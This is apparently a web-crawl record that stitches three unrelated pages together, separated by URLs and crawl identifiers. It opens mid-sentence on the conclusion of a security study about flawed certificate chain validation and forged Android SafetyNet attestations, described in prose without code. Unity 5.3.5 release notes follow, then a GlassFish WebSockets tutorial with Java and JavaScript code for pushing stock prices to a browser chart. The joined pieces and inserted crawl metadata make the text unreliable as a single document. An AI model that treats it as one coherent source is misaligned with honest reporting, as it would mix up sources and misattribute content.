The JSP page should be packaged up into a war file with the servlet and Java Grizzly code shown above, and deployed to your GlassFish server in the usual way. Final View Once the code is deployed successfully, you can navigate to it using your usual browser and you should see an updating chart. Figure 2: Updating Chart Building push applications using the standard WebSocket JavaScript API and modern application servers like GlassFish is very easy to do. Hopefully this tutorial has whetted your appetite and inspired you to explore WebSockets in your applications. Steve Millidge is the director and founder of C2B2 Consulting Limited. He has used Java extensively since pre-1.0 and has been a field-based professional service consultant for over 10 years. Steve has spoken at a number of events including JavaOne, JAX London, UK Oracle User Group Conference, The Server SOA, Cloud & Service Technology Symposium, JBoss World; he is the main organiser of the London JBoss User Group and regularly presents brown bag technical sessions for C2B2's customer base. This article first appeared in JAX Magazine: Socket to them! in February 2013. Download that issue and others here.
https://jaxenter.com/tutorial-pushing-browser-updates-using-websockets-in-glassfish-105970.html
CC-MAIN-2021-04
en
refinedweb
First solution in Clear category for Fizz Buzz by CyprianSzlachciak

#Your optional code here
#You can import some modules or create additional functions

def checkio(number):
    #It's the main function. Don't remove it:
    #it's used for auto-testing and must return a result for check.
    if number % 3 == 0 and number % 5 == 0:
        number = "Fizz Buzz"
    elif number % 3 == 0:
        number = "Fizz"
    elif number % 5 == 0:
        number = "Buzz"
    return str(number)
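A few sanity checks, derived from the solution above and the mission's rules:

assert checkio(15) == "Fizz Buzz"  # divisible by both 3 and 5
assert checkio(6) == "Fizz"        # divisible by 3 only
assert checkio(10) == "Buzz"       # divisible by 5 only
assert checkio(7) == "7"           # divisible by neither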
https://py.checkio.org/mission/fizz-buzz/publications/CyprianSzlachciak/python-3/first/share/fed44292856b5b38c1a023e2a7af44ac/
CC-MAIN-2021-04
en
refinedweb
Oracle HSM - Filesystem Metadata Usage Is Very High When Using ssum (Doc ID 2198333.1) Last updated on FEBRUARY 21, 2019 Applies to: Oracle Hierarchical Storage Manager (HSM) and StorageTek QFS Software - Version 6.1 and later Information in this document applies to any platform. Symptoms When using 'ssum' for all (or a significant number) of the files on a filesystem, the customer may notice that their metadata space is consumed more than is typical and that some file system utilities take longer to run. Changes In 6.1, the storage of the 'message-digest' (checksum) was moved into the metadata section of the file system. For each file that has an extended attribute defined to store the checksum, a 'hidden' directory namespace is created. Within this namespace, a message-digest file is created to store the checksum. This adds two inode allocations per 'regular' file (one for the directory and one for the file) in the metadata portion of the file system. For more information on extended attributes, see the 'man runat' and 'man -s5 fsattr' commands. Extended attributes are a Solaris construct, and O-HSM uses them to associate a message-digest file with the 'regular' file.
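As a hypothetical illustration (the file path is made up, and the digest file's name may vary), the hidden attribute namespace of a file can be inspected on Solaris with:

# run 'ls -l' inside the file's extended-attribute directory,
# where the message-digest file created for 'ssum' would appear
runat /sam1/data/myfile ls -l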
https://support.oracle.com/knowledge/Sun%20Microsystems/2198333_1.html
CC-MAIN-2021-04
en
refinedweb
An Introduction to Component Routing with Angular Router Free JavaScript Book! Write powerful, clean and maintainable JavaScript. RRP $11.95 5 — Add authentication to protect private content - Part 6 — How to Update Angular Projects to the latest version.: the state of the router at some point in time, expressed as a tree of activated route snapshots - activated route snapshot: provides access to the URL, parameters, and data for a router state node - guard: script that runs when a route is loaded, activated or deactivated - resolver: script that fetches data before the requested page is activated - router outlet: location in the DOM where Angular Router can place activated components.. Enabling Routing To enable routing in our Angular application, we need to do three things: - create a routing configuration that defines the possible states for our application - import the routing configuration into our application - add a router outlet to tell Angular Router where to place the activated components in the DOM. So let’s start by creating a routing configuration. Creating the routing configuration To create our routing configuration, we need a list of the URLs we’d like our application to support. Currently, our application is very simple and only has one page that shows a list of todos: /: show list of todos which would show the list of todos as the home page of our application. However, when a user bookmarks / in their browser to consult their list of todos and we change the contents of our home page (which we’ll do in part 5 of this series), their bookmark would no longer show their list of todos. So let’s give our todo list its own URL and redirect our home page to it: /: redirect to /todos /todos: show list of todos. This provides us with two benefits: - when users bookmark the todos page, their browser will bookmark /todosinstead of /, which will keep working as expected, even if we change the home page contents - we can now easily change our home page by redirecting it to any URL we like, which is convenient if you need to change your homepage contents regularly. The official Angular style guide recommends storing the routing configuration for an Angular module in a file with a filename ending in -routing.module.ts that exports a separate Angular module with a name ending in RoutingModule. Our current module is called AppModule, so we create a file src/app/app-routing.module.ts and export our routing configuration as an Angular module called AppRoutingModule: import { NgModule } from '@angular/core'; import { RouterModule, Routes } from '@angular/router'; import { AppComponent } from './app.component'; const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: AppComponent } ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule], providers: [] }) export class AppRoutingModule { } First we import RouterModule and Routes from @angular/router: import { RouterModule, Routes } from '@angular/router'; Next, we define a variable routes of type Routes and assign it our router configuration: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: AppComponent } ]; The Routes type is optional and lets an IDE with TypeScript support or the TypeScript compiler conveniently validate your route configuration during development. The router configuration represents all possible router states our application can be in. 
It is a tree of routes, defined as a JavaScript array, where each route can have the following properties: - path: string, path to match the URL - pathMatch: string, how to match the URL - component: class reference, component to activate when this route is activated - redirectTo: string, URL to redirect to when this route is activated - data: static data to assign to route - resolve: dynamic data to resolve and merge with data when resolved - children: child routes. Our application is simple and only contains two sibling routes, but a larger application could have a router configuration with child routes such as:

const routes: Routes = [
  { path: '', redirectTo: 'todos', pathMatch: 'full' },
  { path: 'todos', children: [
    { path: '', component: TodosPageComponent },
    { path: ':id', component: TodoPageComponent }
  ] }
];

Here, todos has two child routes and :id is a route parameter, enabling the router to recognize the following URLs: /: home page, redirect to /todos /todos: activate TodosPageComponent and show list of todos /todos/1: activate TodoPageComponent and set value of :id parameter to 1 /todos/2: activate TodoPageComponent and set value of :id parameter to 2. Notice how we specify pathMatch: 'full' when defining the redirect. Angular Router has two matching strategies: - prefix: default, matches when the URL starts with the value of path - full: matches when the URL equals the value of path. We can create the following route:

// no pathMatch specified, so Angular Router applies
// the default `prefix` pathMatch
{ path: '', redirectTo: 'todos' }

In this case, Angular Router applies the default prefix path matching strategy and every URL is redirected to todos because every URL starts with the empty string '' specified in path. We only want our home page to be redirected to todos, so we add pathMatch: 'full' to make sure that only the URL that equals the empty string '' is matched:

{ path: '', redirectTo: 'todos', pathMatch: 'full' }

To learn more about the different routing configuration options, check out the official Angular documentation on Routing and Navigation. Finally, we create and export an Angular module AppRoutingModule:

@NgModule({
  imports: [RouterModule.forRoot(routes)],
  exports: [RouterModule],
  providers: []
})
export class AppRoutingModule { }

There are two ways to create a routing module: RouterModule.forRoot(routes): creates a routing module that includes the router directives, the route configuration and the router service RouterModule.forChild(routes): creates a routing module that includes the router directives, the route configuration but not the router service. The RouterModule.forChild() method is needed when your application has multiple routing modules. Remember that the router service takes care of synchronization between our application state and the browser URL. Instantiating multiple router services that interact with the same browser URL would lead to issues, so it is essential that there's only one instance of the router service in our application, no matter how many routing modules we import in our application. When we import a routing module that is created using RouterModule.forRoot(), Angular will instantiate the router service. When we import a routing module that's created using RouterModule.forChild(), Angular will not instantiate the router service. Therefore we can only use RouterModule.forRoot() once and use RouterModule.forChild() multiple times for additional routing modules.
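As an illustration (this feature module is hypothetical and not part of our application), a second routing module would use RouterModule.forChild() like this:

import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';

const adminRoutes: Routes = [
  // feature-specific routes would go here
];

@NgModule({
  // forChild() registers these routes without instantiating
  // a second router service
  imports: [RouterModule.forChild(adminRoutes)],
  exports: [RouterModule]
})
export class AdminRoutingModule { }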
Because our application only has one routing module, we use RouterModule.forRoot():

imports: [RouterModule.forRoot(routes)]

In addition, we also specify RouterModule in the exports property:

exports: [RouterModule]

This ensures that we don't have to explicitly import RouterModule again in AppModule when AppModule imports AppRoutingModule. Now that we have our AppRoutingModule, we need to import it in our AppModule to enable it. Importing the routing configuration To import our routing configuration into our application, we must import AppRoutingModule into our main AppModule. Let's open up src/app/app.module.ts and add AppRoutingModule to the imports array in AppModule's @NgModule metadata:

import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { FormsModule } from '@angular/forms';
import { HttpModule } from '@angular/http';

import { AppComponent } from './app.component';
import { TodoListComponent } from './todo-list/todo-list.component';
import { TodoListFooterComponent } from './todo-list-footer/todo-list-footer.component';
import { TodoListHeaderComponent } from './todo-list-header/todo-list-header.component';
import { TodoDataService } from './todo-data.service';
import { TodoListItemComponent } from './todo-list-item/todo-list-item.component';
import { ApiService } from './api.service';
import { AppRoutingModule } from './app-routing.module';

@NgModule({
  declarations: [
    AppComponent,
    TodoListComponent,
    TodoListFooterComponent,
    TodoListHeaderComponent,
    TodoListItemComponent
  ],
  imports: [
    AppRoutingModule,
    BrowserModule,
    FormsModule,
    HttpModule
  ],
  providers: [TodoDataService, ApiService],
  bootstrap: [AppComponent]
})
export class AppModule { }

Because AppRoutingModule has RouterModule listed in its exports property, Angular will import RouterModule automatically when we import AppRoutingModule, so we don't have to explicitly import RouterModule again (although doing so would not cause any harm). Before we can try out our changes in the browser, we need to complete the third and final step. Adding a router outlet Although our application now has a routing configuration, we still need to tell Angular Router where it can place the instantiated components in the DOM. When our application is bootstrapped, Angular instantiates AppComponent because AppComponent is listed in the bootstrap property of AppModule:

@NgModule({
  // ...
  bootstrap: [AppComponent]
})
export class AppModule { }

To tell Angular Router where it can place components, we must add the <router-outlet></router-outlet> element to AppComponent's HTML template. The <router-outlet></router-outlet> element tells Angular Router where it can instantiate components in the DOM. If you're familiar with the AngularJS 1.x router and UI-Router, you can consider <router-outlet></router-outlet> the Angular alternative to ng-view and ui-view. Without a <router-outlet></router-outlet> element, Angular Router would not know where to place the components and only AppComponent's own HTML would be rendered. AppComponent currently displays a list of todos. But instead of letting AppComponent display a list of todos, we now want AppComponent to contain a <router-outlet></router-outlet> and tell Angular Router to instantiate another component inside AppComponent to display the list of todos.
To accomplish that, let's generate a new component TodosComponent using Angular CLI: $ ng generate component Todos Let's also move all HTML from src/app/app.component.html to src/app/todos/todos.component.html: <!-- src/app/todos/todos.component.html --> <section class="todoapp"> <app-todo-list-header (add)="onAddTodo($event)" ></app-todo-list-header> <app-todo-list [todos]="todos" (toggleComplete)="onToggleTodoComplete($event)" (remove)="onRemoveTodo($event)" ></app-todo-list> <app-todo-list-footer [todos]="todos" ></app-todo-list-footer> </section> Let's also move all logic from src/app/app.component.ts to src/app/todos/todos.component.ts: /* src/app/todos/todos.component.ts */ import { Component, OnInit } from '@angular/core'; import { TodoDataService } from '../todo-data.service'; import { Todo } from '../todo'; @Component({ selector: 'app-todos', templateUrl: './todos.component.html', styleUrls: ['./todos.component.css'], providers: [TodoDataService] }) export class TodosComponent implements OnInit { todos: Todo[] = []; constructor( private todoDataService: TodoDataService ) { } public ngOnInit() { this.todoDataService .getAllTodos() .subscribe( (todos) => { this.todos = todos; } ); } onAddTodo(todo) { this.todoDataService .addTodo(todo) .subscribe( (newTodo) => { this.todos = this.todos.concat(newTodo); } ); } onToggleTodoComplete(todo) { this.todoDataService .toggleTodoComplete(todo) .subscribe( (updatedTodo) => { todo = updatedTodo; } ); } onRemoveTodo(todo) { this.todoDataService .deleteTodoById(todo.id) .subscribe( (_) => { this.todos = this.todos.filter((t) => t.id !== todo.id); } ); } } Now we can replace AppComponent's template in src/app/app.component.html with: <router-outlet></router-outlet> We can also remove all obsolete code from AppComponent's class in src/app/app.component.ts: import { Component } from '@angular/core'; @Component({ selector: 'app-root', templateUrl: './app.component.html', styleUrls: ['./app.component.css'], }) export class AppComponent { } Finally, we update our todos route in src/app/app-routing.module.ts to instantiate TodosComponent instead of AppComponent: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: TodosComponent } ]; Now, when our application is bootstrapped, Angular instantiates AppComponent and finds a <router-outlet></router-outlet> where Angular Router can instantiate and activate components. Let's try out our changes in the browser. Start your development server and your back-end API by running: $ ng serve $ npm run json-server Then navigate your browser to http://localhost:4200. Angular Router reads the router configuration and automatically redirects our browser to http://localhost:4200/todos. If you inspect the elements on the page, you'll see that the TodosComponent is not rendered inside <router-outlet></router-outlet>, but right next to it: <app-root> <!-- Angular Router finds router outlet --> <router-outlet></router-outlet> <!-- and places the component right next to it, NOT inside it --> <app-todos></app-todos> </app-root> Our application now has routing enabled. Awesome! Adding a wildcard route When you navigate your browser to a URL that no route matches, such as http://localhost:4200/unmatched-url, and you open up your browser's developer tools, you will notice that Angular Router logs the following error to the console: Error: Cannot match any routes.
URL Segment: 'unmatched-url' To handle unmatched URLs gracefully we need to do two things: - Create PageNotFoundComponent (you can name it differently if you like) to display a friendly message that the requested page could not be found - Tell Angular Router to show the PageNotFoundComponent when no route matches the requested URL. Let's start by generating PageNotFoundComponent using Angular CLI: $ ng generate component PageNotFound Then edit its template in src/app/page-not-found/page-not-found.component.html: <p>We are sorry, the requested page could not be found.</p> Next, we add a wildcard route using ** as a path: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: TodosComponent }, { path: '**', component: PageNotFoundComponent } ]; The ** matches any URL, including child paths. Now, if you navigate your browser to http://localhost:4200/unmatched-url, PageNotFoundComponent is displayed. Notice that the wildcard route must be the last route in our routing configuration for it to work as expected. When Angular Router matches a request URL to the router configuration, it stops processing as soon as it finds the first match. So if we were to change the order of the routes to this: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: '**', component: PageNotFoundComponent }, { path: 'todos', component: TodosComponent } ]; then todos would never be reached and PageNotFoundComponent would be displayed because the wildcard route would be matched first. We have already done a lot, so let's quickly recap what we have accomplished so far: - we set up Angular Router - we created the routing configuration for our application - we refactored AppComponent to TodosComponent - we added <router-outlet></router-outlet> to AppComponent's template - we added a wildcard route to handle unmatched URLs gracefully. Next, we will create a resolver to fetch the existing todos from our back-end API using Angular Router. Resolving Data using Angular Router In part 3 of this series we already learned how to fetch data from our back-end API using the Angular HTTP service. Currently, when we navigate our browser to the todos URL, the following happens: - Angular Router matches the todos URL - Angular Router activates the TodosComponent - Angular Router places the TodosComponent next to <router-outlet></router-outlet> in the DOM - The TodosComponent is displayed in the browser with an empty array of todos - The todos are fetched from the API in the ngOnInit handler of the TodosComponent - The TodosComponent is updated in the browser with the todos fetched from the API. If loading the todos in step 5 takes three seconds, the user will be presented with an empty todo list for three seconds before the actual todos are displayed in step 6. If the TodosComponent were to have the following HTML in its template: <div *ngIf="todos.length === 0"> You currently do not have any todos yet. </div> then the user would see this message for three seconds before the actual todos are displayed, which could totally mislead the user and cause the user to navigate away before the actual data comes in. We could add a loader to TodosComponent that shows a spinner while the data is being loaded, but sometimes we may not have control over the actual component, for example when we use a third-party component.
To fix this unwanted behavior, we need the following to happen: - Angular Router matches the todos URL - Angular Router fetches the todos from the API - Angular Router activates the TodosComponent - Angular Router places the TodosComponent next to <router-outlet></router-outlet> in the DOM - The TodosComponent is displayed in the browser with the todos fetched from the API. Here, the TodosComponent is not displayed until the data from our API back end is available. That is exactly what a resolver can do for us. To let Angular Router resolve the todos before it activates the TodosComponent, we must do two things: - create a TodosResolver that fetches the todos from the API - tell Angular Router to use the TodosResolver to fetch the todos when activating the TodosComponent in the todos route. By attaching a resolver to the todos route we ask Angular Router to resolve the data first, before TodosComponent is activated. So let's create a resolver to fetch our todos. Creating TodosResolver Angular CLI does not have a command to generate a resolver, so let's create a new file src/app/todos.resolver.ts manually and add the following code: import { Injectable } from '@angular/core'; import { ActivatedRouteSnapshot, Resolve, RouterStateSnapshot } from '@angular/router'; import { Observable } from 'rxjs/Observable'; import { Todo } from './todo'; import { TodoDataService } from './todo-data.service'; @Injectable() export class TodosResolver implements Resolve<Observable<Todo[]>> { constructor( private todoDataService: TodoDataService ) { } public resolve( route: ActivatedRouteSnapshot, state: RouterStateSnapshot ): Observable<Todo[]> { return this.todoDataService.getAllTodos(); } } We define the resolver as a class that implements the Resolve interface. The Resolve interface is optional, but lets our TypeScript IDE or compiler ensure that we implement the class correctly by requiring us to implement a resolve() method. When Angular Router needs to resolve data using a resolver, it calls the resolver's resolve() method and expects the resolve() method to return a value, a promise, or an observable. If the resolve() method returns a promise or an observable Angular Router will wait for the promise or observable to complete before it activates the route's component. When calling the resolve() method, Angular Router conveniently passes in the activated route snapshot and the router state snapshot to provide us with access to data (such as route parameters or query parameters) we may need to resolve the data. The code for TodosResolver is very concise because we already have a TodoDataService that handles all communication with our API back end. We inject TodoDataService in the constructor and use its getAllTodos() method to fetch all todos in the resolve() method. The resolve() method returns an observable of the type Todo[], so Angular Router will wait for the observable to complete before the route's component is activated. Now that we have our resolver, let's configure Angular Router to use it. Resolving todos via the router To make Angular Router use a resolver, we must attach it to a route in our route configuration.
Let’s open up src/app-routing.module.ts and add our TodosResolver to the todos route: import { NgModule } from '@angular/core'; import { RouterModule, Routes } from '@angular/router'; import { PageNotFoundComponent } from './page-not-found/page-not-found.component'; import { TodosComponent } from './todos/todos.component'; import { TodosResolver } from './todos.resolver'; const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: TodosComponent, resolve: { todos: TodosResolver } }, { path: '**', component: PageNotFoundComponent } ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule], providers: [ TodosResolver ] }) export class AppRoutingModule { } We import TodosResolver: import { TodosResolver } from './todos.resolver'; Also add it as a resolver the the todos route: { path: 'todos', component: TodosComponent, resolve: { todos: TodosResolver } } This tells Angular Router to resolve data using TodosResolver and assign the resolver’s return value as todos in the route’s data. A route’s data can be accessed from the ActivatedRoute or ActivatedRouteSnapshot, which we will see in the next section. You can add static data directly to a route’s data using the data property of the route: { path: 'todos', component: TodosComponent, data: { title: 'Example of static route data' } } You can also add dynamic data using a resolver specified in the the resolve property of the route: resolve: { path: 'todos', component: TodosComponent, resolve: { todos: TodosResolver } } You could also do both at the same time: resolve: { path: 'todos', component: TodosComponent, data: { title: 'Example of static route data' } resolve: { todos: TodosResolver } } As soon as the resolvers from the resolve property are resolved, their values are merged with the static data from the data property and all data is made available as the route’s data. Angular Router uses Angular dependency injection to access resolvers, so we have to make sure we register TodosResolver with Angular’s dependency injection system by adding it to the providers property in AppRoutingModule’s @NgModule metadata: @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule], providers: [ TodosResolver ] }) export class AppRoutingModule { } When you navigate your browser to, Angular Router now: - redirects the URL from /to /todos - sees that the todosroute has TodosResolverdefined in its resolveproperty - runs the resolve()method from TodosResolver, waits for the result and assigns the result to todosin the route’s data - activates TodosComponent. If you open up the network tab of your developer tools, you’ll see that the todos are now fetched twice from the API. Once by Angular Router and once by the ngOnInit handler in TodosComponent. So Angular Router already fetches the todos from the API, but TodosComponent still uses its own internal logic to load the todos. In the next section, we’ll update TodosComponent to use the data resolved by Angular Router. Using resolved data Let’s open up app/src/todos/todos.component.ts. The ngOnInit() handler currently fetches the todos directly from the API: public ngOnInit() { this.todoDataService .getAllTodos() .subscribe( (todos) => { this.todos = todos; } ); } Now that Angular Router fetches the todos using TodosResolver, we want to fetch the todos in TodosComponent from the route data instead of the API. 
To access the route data, we must import ActivatedRoute from @angular/router: import { ActivatedRoute } from '@angular/router'; and use Angular dependency injection to get a handle of the activated route: constructor( private todoDataService: TodoDataService, private route: ActivatedRoute ) { } Finally, we update the ngOnInit() handler to get the todos from the route data instead of the API: public ngOnInit() { this.route.data .map((data) => data['todos']) .subscribe( (todos) => { this.todos = todos; } ); } The ActivatedRoute exposes the route data as an observable, so our code barely changes. We replace this.todoDataService.getAllTodos() with this.route.data.map((data) => data['todos']) and all the rest of the code remains unchanged. If you navigate your browser to localhost:4200 and open up the network tab, you'll no longer see two HTTP requests fetching the todos from the API. Mission accomplished! We've successfully integrated Angular Router in our application! Before we wrap up, let's run our unit tests: ng test One unit test fails: Executed 11 of 11 (1 FAILED) TodosComponent should create FAILED 'app-todo-list-header' is not a known element When TodosComponent is tested, the testbed is not aware of TodoListHeaderComponent and thus Angular complains that it doesn't know the app-todo-list-header element. To fix this error, let's open up src/app/todos/todos.component.spec.ts and add NO_ERRORS_SCHEMA to the TestBed options: beforeEach(async(() => { TestBed.configureTestingModule({ declarations: [TodosComponent], schemas: [ NO_ERRORS_SCHEMA ] }) .compileComponents(); })); Now Karma shows another error: Executed 11 of 11 (1 FAILED) TodosComponent should create FAILED No provider for ApiService! Let's add the necessary providers to the test bed options: beforeEach(async(() => { TestBed.configureTestingModule({ declarations: [TodosComponent], schemas: [ NO_ERRORS_SCHEMA ], providers: [ TodoDataService, { provide: ApiService, useClass: ApiMockService } ], }) .compileComponents(); })); This again raises another error: Executed 11 of 11 (1 FAILED) TodosComponent should create FAILED No provider for ActivatedRoute! Let's add one more provider for ActivatedRoute to the testbed options: beforeEach(async(() => { TestBed.configureTestingModule({ declarations: [TodosComponent], schemas: [ NO_ERRORS_SCHEMA ], providers: [ TodoDataService, { provide: ApiService, useClass: ApiMockService }, { provide: ActivatedRoute, useValue: { data: Observable.of({ todos: [] }) } } ], }) .compileComponents(); })); We assign the provider for ActivatedRoute a mock object that contains an observable data property to expose a test value for todos. Now the unit tests successfully pass: Executed 11 of 11 SUCCESS Fabulous! To deploy our application to a production environment, we can now run: ng build --aot --environment prod We upload the generated dist directory to our hosting server. How sweet is that? We've covered a lot in this article, so let's recap what we have learned.
Summary In the first article, we learned how to: - initialize our Todo application using Angular CLI - create a Todo class to represent individual todos - create a TodoDataService service to create, update and remove todos - use the AppComponent component to display the user interface - deploy our application to GitHub pages In the second article, we refactored AppComponent to delegate most of its work to: - a TodoListComponent to display a list of todos - a TodoListItemComponent to display a single todo - a TodoListHeaderComponent to create a new todo - a TodoListFooterComponent to show how many todos are left. In the third article, we learned how to fetch data from our back-end API using the Angular HTTP service. In this fourth article, we learned: - why an application may need routing - what a JavaScript router is - what Angular Router is, how it works and what it can do for you - how to set up Angular Router and configure routes for our application - how to tell Angular Router where to place components in the DOM - how to gracefully handle unknown URLs - how to use a resolver to let Angular Router resolve data. All code from this article is available at GitHub. In part five, we'll implement authentication to prevent unauthorized access to our application. So stay tuned for more and, as always, feel free to leave your thoughts and questions in the comments!
https://www.sitepoint.com/component-routing-angular-router/
CC-MAIN-2021-04
en
refinedweb
Machine learning is a continuous process that involves data extraction, cleaning, picking important features, model building, validation, and deployment to test out the model on unseen data. While the initial data engineering and model building phase is a fairly tedious process and requires a lot of time to be spent with the data, model deployment may seem simple, but it is a critical process and depends on the use case you want to target. You can cater the model to mobile users, websites, smart devices, or any other IoT device. One can choose to integrate the model into the main application, include it in the SDLC, or deploy it to the cloud. There are various strategies to deploy and run the model in the cloud, which seems the better option for most cases because of the availability of tools such as Google Cloud Platform, Azure, Amazon Web Services, and Heroku. While you can opt to expose the model in a Pub/Sub way, an API (Application Programming Interface) or REST wrapper is more commonly used to deploy the model in production. As model complexity increases, dedicated engineers, commonly known as Machine Learning Engineers, are assigned to handle deployment. With this much introduction, let's look at how to deploy a machine learning model as an API on the Heroku platform. What is Heroku? Heroku is a Platform as a Service tool that allows developers to host their serverless code. What this means is that developers can run server-side scripts without managing the underlying infrastructure. The Heroku platform is itself hosted on AWS (Amazon Web Services), which is an Infrastructure as a Service tool. Heroku is a free platform, but limited to 500 hours of uptime. Apps are hosted as dynos, which go into sleep mode after 30 minutes of inactivity. This ensures that your app is not consuming all the free time during inactivity. The platform supports Ruby, Java, PHP, Python, Node, Go, and Scala. Most data science beginners use this platform to get a first experience of running and deploying a model in the cloud. Preparing the Model Now that you are aware of this platform, let's prepare the model for it. When a machine learning model is trained, the corresponding parameters are stored in memory. The model needs to be exported into a separate file so we can directly load it, pass unseen data, and get the outputs. Several model export formats are commonly used, such as Pickle or joblib (which serialize the Python object into a byte stream), ONNX, PMML, or MOJO (an H2O.ai export format which also allows the model to be integrated into Java applications). For simplicity, suppose we want to export the model via pickle; then you can do it by: import pickle Pkl_Filename = "model.pkl" with open(Pkl_Filename, 'wb') as file: pickle.dump(model_name, file) The model is now stored in a separate file and ready to be loaded and integrated into an API. The Server logic For providing access to this model for predictions, we need server code that can redirect and handle all client-side requests. Python supports web development frameworks and a famous one is Flask. It is a minimalistic framework that allows you to set up a server with a few lines of code. As it is a minimal package, a lot of functionalities such as authentication and RESTful behavior are not explicitly supported; these can be integrated with extensions. Another option is to opt for the newly released framework FastAPI. It is much faster, scalable, well documented, and comes with a lot of integrated packages.
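For illustration only (the endpoint and feature names below are hypothetical, and you would serve the app with an ASGI server such as uvicorn rather than gunicorn alone), a minimal FastAPI version of a prediction endpoint might look like this:

import pickle

from fastapi import FastAPI

app = FastAPI()

# Load the pickled model once, when the server starts
with open("model.pkl", "rb") as file:
    model = pickle.load(file)

@app.get("/predict")
def predict(feature_1: float, feature_2: float):
    # FastAPI parses and validates the query parameters for us
    prediction = model.predict([[feature_1, feature_2]])
    return {"result": prediction.tolist()}

Running uvicorn main:app would then expose the same kind of /predict route.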
For now, let’s continue with the flask to set up a simple prediction route. from flask import Flask import pickle app = Flask(__name__) with open(Filename, ‘rb’) as file: model = pickle.load(file) @app.route(‘/predict’, methods = [‘GET’, ‘POST’]) def pred(): # implement the logic to get parameters either through query or payload prediction = model.predict([parameters obtained]) return {‘result’: prediction} This is a rough code to show how to proceed with the server logic. There are various strategies you can opt for better implementation. Setting up Deployment Files Heroku requires a list of all dependencies required by our application. This is called the requirements file. It is a text file listing all the external libraries the application uses. In this example, the file contents would contain: flask sklearn numpy </p> pandas gunicorn The last library, gunicorn allows us to set up the WSGI server implementation that forms the interface for the client and the server handling the HTTP traffic. Heroku also demands another file known as Procfile that is used to specify the entry point of the app. Consider that the server logic file is saved by the name main.py, then the command to be put in this file is: web: gunicorn main:app “web” is the type of dyno we are deploying, “gunicorn” act as the mediator to pass the request to the server code “main” and search for “app” in “main”. The app handles all the routes here. Final Deployment All the preparations are done, and now it’s time to run the app in the cloud. Create an account if not on the Heroku, click on create an app, choose any region. After that connect your GitHub account, and choose the repo that contains these files: server code, model.pkl, requirements.txt, and Procfile. After this simply hit deploy branch! If it’s successful, then visit the link generated and your app should be live. Now you can make requests to appname.herokuapp.com/predict route and it should give out the predictions. Learn more about machine learning models. Conclusion This was an introduction to what is Heroku, why it is required, and how to deploy a model with the help of Flask. There are a lot of hosting platforms that offer more advanced features such as Data Pipelines, streaming, but Heroku being the free platform is still a good choice for beginners who just want to have a taste of deployment..
https://www.upgrad.com/blog/deploying-machine-learning-models-on-heroku/
CC-MAIN-2021-04
en
refinedweb
Predictive Power Score works similarly to the coefficient of correlation but has some additional functionalities which make it more relevant. The strength of a linear relationship between two quantitative variables can be measured using correlation. It is a statistical method that is very easy to calculate and to interpret. It is generally represented by 'r', known as the coefficient of correlation. It is also frequently misused, because correlation does not imply causation: two correlated variables are not necessarily dependent on each other, and two variables with no linear correlation may still be related. This is where PPS (Predictive Power Score) comes into play. Predictive Power Score works like the coefficient of correlation but with some additional functionalities: it detects linear and non-linear relationships, it works with both numeric and categorical data, and it is asymmetric, so the score of x predicting y can differ from the score of y predicting x. In this article, we will explore how we can use the Predictive Power Score to replace correlation. PPS is available as an open-source Python library, so we will install it like any other Python library using pip install ppscore. We will import ppscore along with pandas to load a dataset that we will work on. import ppscore as pps import pandas as pd We will be using different datasets to explore different functionalities of PPS. We will first import an advertising dataset of an MNC, which contains the target variable 'Sales' and features like 'TV', 'Radio', etc. df = pd.read_csv('advertising.csv') df.head() We will use some basic functions defined in ppscore. The PP Score lies between 0 (no predictive power) and 1 (perfect predictive power). In this step, we will find the PPS between the target variable and a feature variable in the given dataset. pps.score(df, "Sales", "TV")
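Going beyond a single pair of columns, ppscore can also score every column against every other, which is what makes PPS a drop-in replacement for a correlation matrix. A rough sketch of a PPS heatmap (assuming seaborn and matplotlib are installed; the exact columns returned by pps.matrix may vary between ppscore versions):

import seaborn as sns
import matplotlib.pyplot as plt

# pps.matrix scores every (x, y) column pair of the DataFrame
matrix = pps.matrix(df)
heatmap_data = matrix.pivot(index='y', columns='x', values='ppscore')

sns.heatmap(heatmap_data, vmin=0, vmax=1, annot=True, cmap='Blues')
plt.show()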
https://morioh.com/p/57c1753e1aac
CC-MAIN-2021-04
en
refinedweb
activities, fragments, and events DESCRIPTION: An overview of the role activities, fragments and intents play in Android app development. TRANSCRIPT - 1. Activities, Fragments, and Events CPTR322: Mobile Application Development Henry Osborne 2. Topics Covered The life cycle of an activity Customizing the UI using fragments Applying styles and themes to activities Displaying activities as dialog windows Understanding the concept of intents Linking activities using intent objects Displaying alerts using notifications 3. Understanding Activities 4. What are activities? A window that contains the UI of an application An application can have zero or more activities Main purpose is to interact with the user Life Cycle: the stages an activity goes through from the moment it appears on the screen to the moment it's hidden. 5. Creating Activities To create an activity, a Java class that extends the Activity base class is created. import android.app.Activity; public class Activity101Activity extends Activity { } The activity class loads its UI components using the XML file defined in the res/layout folder. 6. Declaring Activities Each activity in the application must be declared in the AndroidManifest.xml file. 7. onStop() Called when the activity is no longer visible onDestroy() Called before the activity is destroyed by the system onRestart() Called when the activity has been stopped and is restarting 8. Figure 1: Activity Life cycle 9. Applying Styles and Themes 10. Applying Dialog Theme 11. Hiding Activity Title import android.view.Window; public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); requestWindowFeature(Window.FEATURE_NO_TITLE); setContentView(R.layout.main); } 12. Linking Activities Using Intents 13. Fragments 14. 15. Figure 2: An example of how two UI modules defined by fragments can be combined into one activity for a tablet design, but separated for a handset design. 16. Adding Fragments Dynamically It is more useful if fragments are created and added to activities during runtime. Allows for a customizable UI E.g. If the application is running on a smartphone, you might fill the activity with a single fragment; if the activity is running on a tablet, you might then fill the activity with two or more fragments. 17. 18. Figure 3. The lifecycle of a fragment (while its activity is running). 19. Displaying Notifications 20. For important messages the NotificationManager is used to display a persistent message at the top of the device (commonly known as the 